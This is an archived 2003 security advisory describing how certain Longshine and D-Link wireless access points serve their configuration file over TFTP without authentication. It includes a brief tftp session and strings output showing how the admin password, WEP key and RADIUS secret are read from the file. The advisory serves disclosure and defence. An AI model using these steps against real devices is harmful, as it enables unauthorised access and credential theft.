TUCoPS :: Networks :: Wireless :: wlan5916.htm

Various WLAN Access-Points reveal admin password via tftp of config file
7th Jan 2003 [SBWID-5916]
COMMAND

	Various WLAN Access-Points reveal admin  password  via  tftp  of  config
	file

SYSTEMS AFFECTED

	 Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
	 Versions 03.01.0b and 03.01.0h 
	 (Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.)
	
	 DLink DI-614+ firmware version 2.03

PROBLEM

	Thanks to Lukas Grunwald aka REG lg1 [lukas@dnx.de] advisory :
	
	You are able to connect via tftp to the  access-point  an  you  can  get
	download the configuration without authentication  the  WEP  Secret  for
	the encryption  and  the  password  from  your  radius  server  is  also
	readable. In this configuration in the Username  of  the  Superuser  and
	the corresponding password stored. The WEP  Secret  for  the  encryption
	and the  password  from  your  radius  server  is  also  readable.  This
	"attack" works via WLAN (!!!) and Ethernet.
	
	tftp
	tftp> connect 192.168.108.48
	tftp> get config.img
	Received 780 bytes in 1.0 seconds
	tftp> quit
	
	[~]/-\>strings config.img 
	DNXLABAP01 <- name of the AP
	root	   <- name of the superuser
	XXXXXX123  <- password from superuser
	DNXLABLAN  <- ssid
	secu9	   <- secret for WEP
	7890abcdef <-
	
	You are also able to get the following files:
	
	config.img 
	wbtune.dat
	mac.dat
	rom.img
	normal.img
	

SOLUTION

	None yet

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH